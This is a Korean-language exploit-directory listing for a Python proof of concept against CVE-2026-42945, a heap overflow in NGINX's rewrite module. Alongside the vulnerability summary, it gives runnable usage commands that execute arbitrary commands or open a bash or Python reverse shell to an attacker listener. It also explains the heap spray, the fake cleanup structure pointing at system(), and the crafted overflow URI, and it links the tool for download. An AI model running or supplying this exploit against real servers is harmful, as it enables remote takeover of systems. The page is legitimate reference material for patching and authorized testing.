Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-42945-Reverse-Shell-POC — CVE-2026-42945(NGINX Rift)용 리버스 셸 리스너가 포함된 Python RCE PoC | Kitploit
도구/GitHubGitHub/sec-sys/cve-2026-42945-reverse-shell-poc
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationCTFPenetration TestingRed TeamingRemote Access ToolBinary Exploitation

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
GitHubsec-sys/cve-2026-42945-reverse-shell-poc

CVE-2026-42945-Reverse-Shell-POC

CVE-2026-42945(NGINX Rift)용 리버스 셸 리스너가 포함된 Python RCE PoC

저장소 보기
2개월 전아직 검토되지 않음

CVE-2026-42945 (NGINX Rift) RCE PoC with Reverse Shell

원격 코드 실행 PoC for CVE-2026-42945, NGINX의 ngx_http_rewrite_module에 존재하는 힙 버퍼 오버플로 취약점입니다. 이 포크는 공개된 트리거 PoC에 임베디드 리버스 셸 리스너와 CTF 및 격리된 랩 환경을 위한 설정 가능한 익스플로잇 파라미터를 추가로 포함합니다.


취약점 요약

  • CVE ID: CVE-2026-42945
  • 별칭: NGINX Rift
  • 영향 컴포넌트: ngx_http_rewrite_module
  • 영향 버전: NGINX 오픈소스 0.6.27 – 1.30.0; NGINX Plus R32 – R36
  • 수정 버전: NGINX 오픈소스 1.30.1 / 1.31.0; NGINX Plus R36 P4, R35 P2, R32 P6
  • 근본 원인: 2패스 스크립트 엔진 불일치. 길이 계산 패스는 is_args = 0 상태의 새로운 서브 엔진에서 실행되지만, 복사 패스는 is_args = 1 상태의 메인 엔진에서 실행되어 ngx_escape_uri(..., NGX_ESCAPE_ARGS)를 호출합니다. 이스케이프 가능한 바이트는 각각 3바이트로 확장되며, 공격자가 제어하는 URI 데이터로 작은 힙 버퍼를 오버플로시킵니다.
  • RCE 선행 조건: 이름 없는 PCRE 캡처($1, $2)와 교체 문자열의 ?를 사용하는 취약한 rewrite/set 설정; ASLR 비활성화 또는 알려진 힙/libc 베이스 주소; POST 본문을 통한 힙 스프레이 가능 여부.

파일

파일설명
cve_2026_42945_rce_poc.py내장 리버스 셸 리스너 및 명령 실행 모드를 포함한 Python 익스플로잇.

요구 사항

  • Python 3.8+
  • 취약한 버전 및 설정 프로필에 해당하는 대상 NGINX 인스턴스
  • 대상 HTTP 포트에 대한 네트워크 접근성
  • 리버스 셸의 경우: 공격자 호스트는 선택한 리스너 포트에서 대상으로부터 접근 가능해야 함

사용법

단일 명령 실행

root@kitploit:~
python3 cve_2026_42945_rce_poc.py \
  --host 10.0.0.5 \
  --port 80 \
  --cmd "id > /tmp/pwned"

리버스 셸 생성 (기본 bash)

root@kitploit:~
python3 cve_2026_42945_rce_poc.py \
  --host 10.0.0.5 \
  --port 80 \
  --shell \
  --listen-ip 10.0.0.1 \
  --listen-port 1337

Python 리버스 셸 페이로드

root@kitploit:~
python3 cve_2026_42945_rce_poc.py \
  --host 10.0.0.5 \
  --port 80 \
  --shell \
  --shell-type python \
  --listen-ip 10.0.0.1 \
  --listen-port 1337

특정 대상에 대한 주소 보정

root@kitploit:~
python3 cve_2026_42945_rce_poc.py \
  --host 10.0.0.5 \
  --port 80 \
  --shell \
  --listen-ip 10.0.0.1 \
  --listen-port 1337 \
  --heap-base 0x555555659000 \
  --libc-base 0x7ffff77ba000 \
  --system-offset 0x50d70

동작 원리

  1. 힙 스프레이: 가짜 ngx_pool_cleanup_s 구조체(system@libc | 명령어 포인터 | null)를 본문에 포함한 여러 POST 요청을 전송합니다. 이 본문들은 안정적인 힙 위치를 차지합니다.
  2. 오버플로 트리거: 취약한 rewrite 엔드포인트에 조작된 GET 요청을 전송합니다. URI 패턴은 다음과 같습니다:
    root@kitploit:~
    /api/<349 x 'A'><969 x '+'><6바이트 힙 주소>
    
    오버플로는 인접한 ngx_pool_t의 cleanup 포인터를 손상시킵니다.
  3. 코드 실행: 풀이 파괴될 때 손상된 cleanup 포인터가 system(command)를 호출하여 NGINX 워커 프로세스 내에서 공격자가 제어한 명령을 실행합니다.
  4. 리버스 셸: --shell이 사용된 경우 명령은 리버스 셸 페이로드이며, 임베디드 리스너가 들어오는 연결을 수신합니다.

보안 고지

이 도구는 다음 용도로 제작되었습니다:

  • CTF 및 랩 실습
  • 서면 허가를 받은 공인된 침투 테스트
  • 보안 연구 및 방어 강화 활동

소유하지 않았거나 명시적 테스트 허가가 없는 시스템에는 사용하지 마십시오.


라이선스

본 도구는 사용자 본인의 책임 하에 사용하십시오. 작성자는 무단 또는 불법적인 사용에 대해 책임을 지지 않습니다.


출처 표기

원본 취약점 연구 및 PoC: depthfirstdisclosures (https://github.com/depthfirstdisclosures/nginx-rift). 이 Python 리버스 셸 포크는 레드팀 랩 / CTF 사용을 위해 제작되었습니다.


참고 자료

  • NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-42945
  • NGINX 보안 권고: https://nginx.org/en/security_advisories.html
  • F5 / NGINX 지식 베이스: https://my.f5.com/manage/s/article/K000161019
  • 원본 연구 저장소: https://github.com/depthfirstdisclosures/nginx-rift
도구 다운로드